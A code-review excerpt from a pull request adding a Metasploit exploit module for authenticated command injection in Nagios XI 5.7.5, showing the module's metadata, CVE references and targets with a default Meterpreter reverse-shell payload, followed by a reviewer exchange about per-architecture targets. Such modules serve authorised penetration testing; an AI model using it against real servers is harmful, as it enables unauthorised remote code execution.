modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb

```diff
@@ -0,0 +1,195 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::NagiosXi
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Nagios XI 5.7.5 - ConfigWizards Authenticated Remote Code Exection',
+        'Description' => %q{
+          This module exploits CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298,
+          OS command injection vulnerabilities in several URL parameters that enables
+          an authenticated user to perform remote code execution on Nagios XI 5.7.5 as
+          the apache user.
+
+          Valid credentials for a Nagios XI user are required. This module has
+          been successfully tested against the official NagiosXI 5.7.5 OVA.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Matthew Mathur'
+        ],
+        'References' => [
+          ['CVE', '2021-25296'],
+          ['CVE', '2021-25297'],
+          ['CVE', '2021-25298']
+        ],
+        'Platform' => %w[linux unix],
+        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
+        'Targets' => [
+          [
+            'Linux (x86/x64)', {
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'Platform' => 'linux',
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
```

Comment:
Question but why would we want to run an x86 Meterpreter on an x64 host? This seems like an odd default for a x64 target.

Reply:
This has not been resolved despite this being marked as outdated. 

Ideally what you should have is multiple targets. One for Linux x64, one for Linux x86 and one for ARCH_CMD, and then set the Arch, Platform, and the DefaultOption for the payload accordingly.

Reply:
Sounds good, I can make that adjustment

Reply:
Failed to notice we already had ARCH_CMD in here. Went and updated this to have a separate default payload for x86 with e533cb80432959264692d0e94ee6f48c2733ba25.